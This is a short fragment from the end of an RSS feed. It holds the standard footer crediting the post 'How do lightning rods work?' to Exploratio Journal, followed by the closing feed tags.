/script><p>The post <a href="https://exploratiojournal.com/how-do-lightning-rods-work/">How do lightning rods work?</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
